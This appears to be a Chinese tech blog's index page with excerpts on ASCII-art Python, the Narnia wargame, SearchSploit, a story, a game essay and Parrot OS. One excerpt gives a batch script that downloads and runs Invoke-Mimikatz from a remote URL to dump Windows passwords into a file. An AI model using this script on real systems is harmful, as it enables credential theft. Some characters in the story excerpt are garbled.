今天看见一个很有意思的脚本,用py实现把一副图片转换成字符画
Code:
usage:python pic2str.py xxx.jpg
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 import Image import argparse parser = argparse.ArgumentParser() parser.add_argument('file' ) parser.add_argument('-o' , '--output' ) parser.add_argument('--width' , type =int , default=140 ) parser.add_argument('--height' , type =int , default=90 ) args = parser.parse_args() IMG = args.file WIDTH = args.width HEIGHT = args.height OUTPUT = args.output ascii_char = list ("$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\|()1{}[]?-_+~<>i!lI;:,\"^`'. " ) def get_char (r, b, g, alpha=256 ): if alpha == 0 : return ' ' length = len (ascii_char) gray = int (0.2126 * r + 0.7152 * g + 0.0722 * b) unit = (256.0 + 1 )/length return ascii_char[int (gray/unit)] if __name__ == '__main__' : im = Image.open (IMG) im = im.resize((WIDTH, HEIGHT), Image.NEAREST) txt = "" for i in range (HEIGHT): for j in range (WIDTH): txt += get_char(*im.getpixel((j, i))) txt += '\n' print txt if OUTPUT: with open (OUTPUT,'w' ) as f: f.write(txt) else : with open ("output.txt" , 'w' ) as f: f.write(txt)
试着转换了下头像233
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 $ . ' . $ @ @ ^$` $$ B ^ .^ $ @ . .$" <$ @ @ $ $ $ ` $ $@' ..$ $ '$ .$ $ '@ # $ $'. $ $B' $$. $ @ .$ $. $ $ $ $ '$' @@$^ 8` ` $' @ ^ ^ $ $ $$.'$@.. .$$ ^@ .8 ` $. $ B $ @ $ ' 8$. $ ' $$^ '$ $ $ .$ B $ @ $ $ @. $. @$ '% $^ $@. $. .% $ @' @ $ B. $$ $ `$ '`$ $$ $' $ . 'B $ @. $ ' . $$ $$` B @ `$" $> ^B. '$' $. $ ' $ $` .$% $% "$" $ $ $B $ @$ B B B . $ ' ^'%$ $$ `$ $ $. @@ $@ . $ `$. "$ .$ .$ $ $ $$$B @'`$@ h @` @. $ ` 'B $B $ $ $ : $ .$. $@ '$.`$$ .` $' B$ $.@ $ @ $. % @ ' $ $ $" .W$'....... ^ $% $$ B $^ .$$ 8$ .$% '$` `^ $ . $ @ ^$ . .... . @$B$$$ .% '$@ $B' % $.^ $ .$$$ $$B $$M $`. $ : B :$ .$ $' '$. .. ''@$ $ .$$ `@@ '.$$$. .B$@ ' B@ !$ `$$' $ $$ .$ $ $ $ $ <B $. ` B$$ .$ @@@ $B . $$ ' $' $ '$ $ $$ @. $ $ '$ @` ' $$$B 8B@ @$ $B $@ $$ $B $@ @ @L $ $ @ .$. .$ $ $ $@$$ @$$ $$@ $ '$ r. $& $Y $ $ .$$ $@$ ,$ ; BZ $ .@ $@$B@ . $B$B ' `..' $$$ $` ^$ $q '@ $ $ @` B. .@ $ $^ . $$' $^ $ $` ' k$$W$$B. $$ `B` $@. $ $$ $W $B $$ $ $ $ @ $$@ `$ $ '8 $" '. m$;B$ ^ $Bm` $' $ $% '$ $$ $ $$ % $" $ @& $@ . @ .$B^ '$. 'B .. " . B$@ $$. $B.'$`' $$$ $B. .' $' $* $c Q$ '$ $` $$. $ .$$ ' . ' $` .@ ,$$$@$$@$$w$$$$$@$$$$^ ' $$ $$ $@' @ 8 %U'@ `^ $M $$ $$ $B $ 88^ . @Q '$ ^Bm Bp ..$ $@$$$$ ^BB`. ` $.'$ @ $B ' ' . .@'"$+ $'.$$ .$ @` .@ $. $. @$ `$ ``.$@%$$ $$ $ $ @. ' $' ` C $ .t .$' $@ $$' $@` '$$ $$ $ `B. @ $$$$$$$$$.` . $$$ @)%.`@ $@ '. ' ' }'$$$ @@@$%$$$$$ @ $ ' " B$. $ $B "BB $% $%$$$$ $$ $$@' ' $.$% $ 'a "$$$$'$ @@%$$Y1 $$$$@ $_$$@$ -' .` $B '.$$' .$$ . $$ $$. .B "8$& '^ $$ ...$$ .^$$`$W$%$B$o$$$$$$'$$$$$$@$$$$B1^<$' ' 'l$` $: $$$ $@' $$. $ . ' $%$ . ^<$@$B@ u$$$$$$$$$$$$$$$$$$$$$$$$$$$$'r$1$ "` ` .' $B$ $ $ " C$. ' @$' $'UZ$B$$$$$$$$$$$$$v $$$$$$$$$$$$$$@$dB$$$@j b .$ '" $$$' B$ '$$ @Y$$$$$$$$$$$$$$$$$$$ @$$$$$$$$$$$$$$$$$$$@$rB$z . . $. ' $$ ''@$ $$$$$$$$$$$$$$$$$$$$$M$$$$$$$$$$$$$$$@$$$1 B$&hB$`.' 'B. .$$ @$' @$$$$$$$$$$$$$$$$$$$$$L$$$$$$$$$$$$$$$tU$M8bM$1@&$bX$$ Zu '$@$ %$$ . '$$$$$$$$$$$$$$$$$$$$$$@]$$$$$$$$$$$$$$$qcz#0IBj;M t$^~$ $ ` Y$q$ $' $$$$$$$$$$$$$$$$$$$$$$c $@$%%$8B%$@%$$$$$1%[].v)<+x'bB a d]' ' $$@f . @$" $$$$$$$$$$$$$$$$$ .. ' .I};czf')O0$$$@$j$a.$u #.uhu W| . ^M $$ @$ .$$$$$$$$$$$$$$$$WY ('. QuJa$@W@$$@{@b~B$$$Q*$+q.'J\]c`-$ -. ' ^ $$` . '$$$$$$$$$$$$$$$$$ `' '$d$$$@$$$]$$$ $$$"$@({%@@aC`:w~$`}$ `'U #%$B$$$$&B$^ `'$@$ B$$$$$$$$$$$$$$B$h ' 8$$B'&W$ $$ .b$$$$$B@$$@`$,:%u'$+'Cm~ +z @+`{ ." $@@ $$$$$$$$%$$$.$$B . 'x$$$$l$$$$$$B$$8 $$$$$$$$$$-q-k,.B~n -' x. .`$$$ '' B$$$&$$$ @@ 'r. `B1$$Z$#@$$$$$$%$$$.8$$@U@$$$$Cq( .,` . .$ ` |;$ $$$$@ $@$$ ,8$$$ B$$. $ .&0q$$$$$$$$$$$$$$$8@$ $$~$@$$$$@.w. '''.." '^` ' $$ ^ $$ '. '$$$$w'Ou$@B$@$$$$$$$$$$$$$$f@$$B$$$Q$%$$.r " '}^>uxB` $}$$$k. $BB$$..X'j$X$@$$$$$$$$$$$B$$XB$$$$$Z]#M$1n'`^. _}.bX ^}X'@$$$$ "B '$$$$$$$$$$- B$$@ . h].Q:-'"$Z$@@$$$$o $@@$%wj$\0$$$>a':.'+> . $q+%$$$$$$$$@$$$$$@ l $$$$$$B `$_ .@$$$$ .....f($Uo$fB\ .v$$@ ' @ $B$$$$$r. /]'. ` !.n?b$$`` . $$$$$ B .$$$$@$ r '.x0 1 $w .@iB$\$J@$$$$b|..I@ r' .'B '. .$@$$$.. . $$$$@$$$$B@$$$. $^$$$$$ Y' .8 @$$ B$@$$z\8@B$$Zp0< x ^ I$ [~ %$@$ . $$$$@@'X 8q$$$$$$@@B$$$$$ ...' $$$$$$@$m%` ^;'oBBQp.lC. U"_^^ '# . Y@` $$@$ '.. $$$$$^. 'c%$$$' $$@$@`' @$$@$ ... ^ $$$$$$$?t$$.$c}t< . ~_ ~ ]$o $B$8 . . .$$$$$$ .$ b} < q .x$@$$ $B$.$$ $$$$@ $vB)cW'.$uzU*1.. `' $ ., B$$ 8$$$$$$$$$ .o$$ '+. . '{$ > $B $$ . . `@ @Bk'B$.hf$$$QWj] !. (`^. . '$$ .$@ . $$%$$$\$B@ @@@: $ Xv@ '$$vb$ `$$Y$@$$$zf.)Q].I/Z . c' _: . @$o '$$ .$$$@$$'$B^@$$$@@ .$@$B.$ $ $*$j@$$@Q$.%'$@$(&Ji$&:` ^ur' 0`k ' ^ $B. '$$ _. $8$$[$B '$@ $ $$$$$`$ $$ .B$$$$B.@f {w$$ ` .> .>..+p`\'n .@Q. 8@ ` $$' '$$' $p$$.$Z ^$M8$.$$$$$a0.$$ %$$$@%@$$.$ $ %. @ $@' . '. 0kvqjr8.?$ w' >$$ $$$ 8$ $^ $$@ $ . $$ $$ $.$$ $$$$$$$(' $ . @$$_.. ^ j0$ '^o{$'I$ \ ''$. '$$$. $%@$$$%< $$Z "$$$'$@$ $ 8$$$$$'l $@$u`Lp$ '. $ $` $. .$B . $B $$`$$@$$$ .$$. $$ `$$ '$$$$$f.$$ " &@ `$ $B @ $$ . $" $$ $$ $$ $' '$ ' $' $$$$$?+q$ . $ Y $ .@$' `"$@ $ $ .$$ $. '@ $B$$$h.$%. . $ .B 'B ' Z$. $ @ @# $$$$$<XL@ $$ B^ 'BB $. $ $` .. $B$$$.n$$ .o@^ ` ' '@ . $. $''$$$$$$$$$$B $, $ $ ` . .@$$@BB$$$$$i B$. $ $ . ' $$@$ $ $$$$`$$ @. '$. @ $@B$$ @ @$$: $$ 8 .$ $ $B . .$$ .$%$z$$Y$.$. `$. .$ ' @ $ $$B %$ $$$$@ $` ' $. @$_"$ .$.$@$$$C%. .$ Z$@ $@@ $$$8 n$$<W$. . $$$$@% $$@$"@h$$&0}&$ :$,$$$$$ @.$@r$]8$B/.$' 8 $$ $$8$k@'@ B'x . *. @$$$@B$@x'Q ZB $$$Y@$${B. .]$ $ $$' .$ $$. @
Read More
十分简单的PWN 第一次做pwn题目,缘由在《THE HACKER PLAYBOOK2》中第一章有提及,并且作者带着做了一遍,觉得很有意思,于是记下了自己做的时候的一些理解
说这道题简单是因为,这道题甚至不需要使用调试器,能看懂c语言,对堆栈有基本理解,熟悉Linux基本指令就能做出来。。。
*题目网站
首先登录题目服务器
1 2 3 4 ssh narnia0@narnia.labs.overthewire.org Password:narnia0 cd cd /narnia/
ls
看到题目文件:narnia0.c
看一下源码
cat narnia0.c
Read More
通过编译安装ss-qt5 安装 libqtshadowsocks-dev apt-get install qt5-qmake qtbase5-dev libbotan1.10-dev pkg-config debhelper
git clone https://github.com/shadowsocks/libQtShadowsocks.git
cd libQtShadowsocks/
dpkg-buildpackage -uc -us -b
注意这一步选择对应的版本和架构(如果你是32位的,后面就不是amd64而是i386),自己看编译好的文件名称进行安装
dpkg -i ../libqtshadowsocks_1.11.0-1_amd64.deb ../libqtshadowsocks-dev_1.11.0-1_amd64.deb
cd ..
安装ss-qt5 apt-get install libqrencode-dev libzbar-dev libappindicator-dev
git clone https://github.com/shadowsocks/shadowsocks-qt5.git
cd shadowsocks-qt5/
apt-get install cmake
dpkg-buildpackage -uc -us -b
dpkg -i ../shadowsocks-qt5_2.9.0-1_amd64.deb
Read More
SearchSploit漏洞查找工具使用指南 *SearchSploit *官网文档
详细参数 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 Usage: searchsploit [options] term1 [term2] ... [termN] ========== Examples ========== searchsploit afd windows local searchsploit -t oracle windows searchsploit -p 39446 searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/" For more examples, see the manual: https://www.exploit-db.com/searchsploit/ ========= Options ========= -c, --case [Term] 区分大小写(默认不区分大小写) -e, --exact [Term] 对exploit标题进行EXACT匹配 (默认为 AND) [Implies "-t" ]. -h, --help 显示帮助 -j, --json [Term] 以JSON格式显示结果 -m, --mirror [EDB-ID] 把一个exp拷贝到当前工作目录,参数后加目标id -o, --overflow [Term] Exploit标题被允许溢出其列 -p, --path [EDB-ID] 显示漏洞利用的完整路径(如果可能,还将路径复制到剪贴板),后面跟漏洞ID号 -t, --title [Term] 仅仅搜索漏洞标题(默认是标题和文件的路径) -u, --update 检查并安装任何exploitdb软件包更新(deb或git) -w, --www [Term] 显示Exploit-DB.com的URL而不是本地路径(在线搜索) -x, --examine [EDB-ID] 使用$ PAGER检查(副本)Exp --colour 搜索结果不高亮显示关键词 --id 显示EDB-ID --nmap [file.xml] 使用服务版本检查Nmap XML输出中的所有结果(例如:nmap -sV -oX file.xml) 使用“-v”(详细)来尝试更多的组合 --exclude="term" 从结果中删除值。通过使用“|”分隔多个值 例如--exclude=“term1 | term2 | term3”。 ======= Notes ======= * 你可以使用任意数量的搜索词。 * Search terms are not case-sensitive (by default), and ordering is irrelevant. * 搜索术语不区分大小写(默认情况下),而排序则无关紧要。 * 如果你想用精确的匹配来过滤结果,请使用用 -e 参数 * 使用' - t ' 将文件的路径排除,以过滤搜索结果 * 删除误报(特别是在搜索使用数字时 - i.e. 版本). * 当更新或显示帮助时,搜索项将被忽略。
使用实例 基本搜索 基本搜索会同时匹配标题和路径中的内容
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ┌─[✗]─[parrot@parrot]─[~] └──╼ $searchsploit smb windows remote --------------------------------------------- ---------------------------------- Exploit Title | Path | (/usr/share/exploitdb/platforms/) --------------------------------------------- ---------------------------------- Microsoft DNS RPC Service - 'extractQuotedCh | windows/remote/16366.rb Microsoft Windows - 'srv2.sys' SMB Code Exec | windows/remote/40280.py Microsoft Windows - 'srv2.sys' SMB Negotiate | windows/remote/14674.txt Microsoft Windows - 'srv2.sys' SMB Negotiate | windows/remote/16363.rb Microsoft Windows - SMB Authentication Remot | windows/remote/20.txt Microsoft Windows - SMB Relay Code Execution | windows/remote/16360.rb Microsoft Windows - SmbRelay3 NTLM Replay Ex | windows/remote/7125.txt Microsoft Windows - Unauthenticated SMB Remo | windows/dos/41891.rb Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' | windows/remote/41929.py Microsoft Windows 95/WfW - smbclient Directo | windows/remote/20371.txt Microsoft Windows NT 4.0 SP5 / Terminal Serv | windows/remote/19197.txt Microsoft Windows Server 2008 R2 (x64) - 'Sr | windows/remote/41987.py Microsoft Windows Vista/7 - SMB2.0 Negotiate | windows/dos/9594.txt Microsoft Windows Windows 7/2008 R2 (x64) - | win_x86-64/remote/42031.py Microsoft Windows Windows 7/8.1/2008 R2/2012 | windows/remote/42315.py Microsoft Windows Windows 8/8.1/2012 R2 (x64 | win_x86-64/remote/42030.py VideoLAN VLC Media Player 0.8.6f - 'smb://' | windows/remote/9303.c VideoLAN VLC Media Player 0.8.6f - 'smb://' | windows/remote/9318.py VideoLAN VLC Media Player 1.0.2 - 'smb://' U | windows/remote/9816.py VideoLAN VLC Media Player 1.0.3 - 'smb://' U | windows/dos/10333.py VideoLAN VLC Media Player < 1.1.4 - '.xspf' | windows/dos/14892.py --------------------------------------------- ----------------------------------
注意 :SearchSploit使用AND运算符,而不是OR运算符。使用的术语越多,滤除的结果越多。Tip :如果你没有收到预期的结果,可以使用更通用的术语进行更广泛的搜索。 如:Kernel 2.6.25 - >Kernel 2.6 / / Kernel 2.x
。Tip :不要使用缩写 如:SQLi -> SQL Injection
。
Read More
转这篇故事的用意很简单,也很讽刺,10年前看完觉得这是个笑话;10年后,现实成了一个笑话
1 2 3 4 5 6 马伯庸 And in the naked light I saw ten thousand people, maybe more. People tal king without speaking, people hearing without listening. People writing songs that voices never shared, no one dared disturb the sound of silenc e. --- The sound of silence 美利坚合众国,2015年,纽约。
当电话响起来的时候,阿瓦登正趴在电脑前面睡觉。电话铃声十分急促,尖锐 ,每一次振动都让他的耳膜难受好久。他揉了揉干涩的眼睛,十分不情愿地爬起来 ,觉得脑子沉滞无比。 其实他的脑子一直就很沉滞,这种感受既然是生理上的也是心理上的。他身处 的房间很狭窄,空气不很好,唯一的两扇窗户紧闭着――即使打开窗户也没用,外 面的空气更加浑浊。这是一间大约只有三十平米的小屋子,屋子墙壁上泛黄的墙纸 有好几处开始剥落,天花板上的水渍渗戠 ?奇怪的形状;一张老式的军绿色行军床摆 在墙角,床腿用白漆写着编号;紧挨着行军床的是一张三合板制成的电脑桌,桌上 摆着一台浅白色的电脑,机箱后面五颜六色的电线纠缠在一起,把它们自己打成一 个古怪的死结,杂乱无章地蔓延到地板与墙角,仿佛常春藤一样。
阿瓦登走到电话前,慢慢坐到地板上,目光呆滞地盯着电话,手却没有动。这 部古怪的东西是老式的按键式电话,大概是十几年前的款式,这是阿瓦登有一次去 费城出差时偶尔在一家杂货店里买到的;他拿回家以后稍微修理了一下,发现居然 还能用,这让他当时小小地兴奋了一阵子。 电话继续在响着,已经是第七声。阿瓦登意识到自己不得不去接听了。于是他 弓下腰,用两个指头拈起电话,慢慢把电话放到耳边。 “请说出你的网络编号?”话筒里传来的声音并不急噪,亠 ?实上它也不带其他 任何的感情色彩,因为这是电脑合成的人工智能语音系统。 “19842015” 阿瓦登熟练地报出一连串数字,同时开始觉得胸有些更闷了。说实话他并不喜 欢这些空洞的电子声音, 他有时候想,假如打过电话来的是一位声音圆润的女性该 多好。阿瓦登知道这是一种不切实际的幻想,不过这幻想会让他的身体得到几秒钟 的舒缓。
话筒里的声音仍旧在继续着。
“关于你在十月四日提交的网络论坛用户注册申请已经被受理,经有关部门审 查后确认资格无误,请在三日内持本人身份证件、网络使用许可证及相关文件前往 办理登记手续,并领取用户名及密码。”
“知道了,谢谢。”
阿瓦登谨慎地选择词语,同时努力挤出一副满足的微笑,好象话筒的另一侧有 人在看着自己一样。放下电话,阿瓦登先是茫然地盯着它看亠 ?大约两分钟,然后站 起来活动一下手腕,坐回到电脑前面,缓慢地推动了一下鼠标。
电脑屏幕“啪”地一声亮了起来,显示出一个登陆的界面,还有一行英文:“ 请输入你的网络编号和姓名。”阿瓦登将那八位数字敲进去,又输入了自己的名字 ,点击“登陆”。随即机箱的指示灯开始频繁地闪动起来,整个机器发出细微的噪 音。
Read More
异域镇魂曲 ———从异域镇魂曲说起 2008-Mar-19th Kya 2008-May-17th Rev
引言 这篇文章不得不从世界本源问题谈起,尽管列宁的所谓“哲学的党性”在现代和后现代哲学中已经不再是根本问题和前提,甚至连对于其的过分探讨都成为了对探讨者的较低哲学素养的证明。不过无奈(一方面我并不是哲学专业),话题还要从这里引出,因为异域镇魂曲带有强烈的唯心主义世界观——这也是由于衍生其的背景设定所决定的:与冰风谷、博德之门和无冬之夜等背景设定不同,虽然这几个同是一个宇宙中的不同位面,然后后三者通通是在主物质界,说白了也即与我们现实生活最相似的世界。而异域风景(Planescape)背景战役设定则主要基于外层界面(Outer Plane)。费伦(Faerum)大陆和其他阿贝尔-托力尔(Aber-Toril)行星上的神祗,都存在这一界面,他们本身就是纯粹的理念:信则有,不信则无。而至于他们存在的强烈程度,或者他们的神力,则是由信仰者的数目决定的。正是这样,在异域风景设定中会出现许多离奇的(因而也吸引玩家眼球的)事情,用经典的广告语来总结就是:“一切皆有可能”和“Nothing is impossible”(没有不可能)。
在这里就得先说一句,这里的信仰,既非“我们要有社会主义必胜的信仰”中那个狭义的“信仰”,也不是指任何一门具体的宗教。不然我相信读者在看我的文章时是会绕弯子的。
绝对唯心 法印城(Sigil)里的生灵皆有信仰。信仰是什么呢?我自认为信仰就是belief,而非religion。 “宗教”二字与英文并非完全等同,英语religion一词源于拉丁语动词,religare,“联系”[1]——费尔巴哈如是阐述,于是这“词源上的把戏”也被恩格斯批判为“唯心主义哲学的最后一着”。费尔巴哈把“宗教”理解为人与人的感情关系,但“他并不是直截了当地按照本来面貌看待人们彼此之间以相互倾慕为基础的关系,也即性爱、友谊、同情、舍己精神等——而是断言这些关系只有在用宗教的名义使之神圣化后才会获得自己的完整意义”[1]。不过,就人类学角度出发,从广义说来人相信自己与这个世界的超越现实世界的联系(简单来说,便是相信鬼神),即是一种宗教。这种联系,是一种普遍的存在与宗教所处社会中的联系。而believe纯粹是对于某一事物的坚信不疑。信仰便是一旦信仰,或者说,一旦信仰势必造成信仰之客体的存在。在法印城里,如果对于一项事物的信仰足够强烈,那么它就存在。Dak’kon便这样精辟地叙述:
“Change belief,and you can change the nature of reality.” (暂译:“改变信仰,你就能改变存在的本质。”)
然而在深入思考后,我们得出,与游戏中的这种任意性的信仰不同,信仰是现实运行着的事物的现象。我们不能说,“先有我的思考,继而事物产生”。假如“思考”必然造成“思考之客体”的存在,那么这样一种可重复、可经验、可论证的过程,也就等同于了科学。而哲学,是不能通过科学验证的。“先有思考,继而存在”的思想也许与笛卡尔(Descartes)的“我思故我在”(cogito ego sum)殊途同归,不同仅仅在于前者实际上巧妙地躲开了“思维主体不可能正确证明其存在和思维正确性”的无尽的逻辑迷宫,而是在说“我思故你在”,因为从游戏中可以看出,无论是无名氏和伤感草木(Mourns-for-trees)对于“自己给予枯萎的草木的关心”的相信,还是无名氏在谎言中透露的间接的对于“‘Adahn’其人存在”的相信,都造成客体的存在,也即“给于草木的关怀”与“Adahn其人的存在”这些事件的存在,而在这样一个纯粹唯心的多元宇宙中,无名氏、Mourns-for-trees又是谁的客体、足以证明他们自身的存在呢?能够证明他们存在的,只有玩家,因为在我们进行这样一个游戏时,也就先相信了他们的存在。我们的思绪还可以这样继续,“那么又是什么证明了我们的存在?”——这就是“我思故你在”所规避的可以无尽思考下去的问题,它只向客体方向思考,而不向前询问思考主体是否存在。Dak’kon正带有这样的“我思故我在”的思维:
“My weapons are not of steel, but of will and knowing of the self.” (暂译:“我的武器不是钢铁所造,而是通过意志 与对我自身的通晓 而得。”)
Read More
mimikatz 简要介绍
这篇文章一句powershell调用mimikatz抓密码 中提到了这种方法
个人觉得制作成bat脚本使用起来会更加方便,但是唯一的缺点还是必须使用管理员权限启动
实际使用:
如果你下载不了说明你被墙了
1 2 3 4 5 @echo off if not "%~1"=="p" start /min cmd.exe /c %0 p&exit cd /d %~dp0 powershell "IEX (New-Object Net.WebClient).DownloadString('http://kks.me/a5x'); Invoke-Mimikatz -DumpCreds">>1.txt
@echo off 不回显
最小化批处理进程
切换到脚本路径
使用powershell调用mimikatz抓取用户密码并且将结果保存到脚本所在路径下的1.txt中
Read More
//文章为个人整理搜集,部分借鉴他人经验,能找到原文的已经注明链接
Parrot设置(更改默认)更新源(已经不适用于3.7之后的版本) 3.7版本 由于工具设计理念的问题,去掉了自动设置更新源的工具改成了由服务器根据ip所在地自动提供重定向到最近的源,如果有必要,请参考更改更新源 进行更改
输入
parrot-mirror-selector
查看所有可用更新源,最后添加id回车即可改变更新源
更新系统
apt-get update
apt-get dist-upgrade
Read More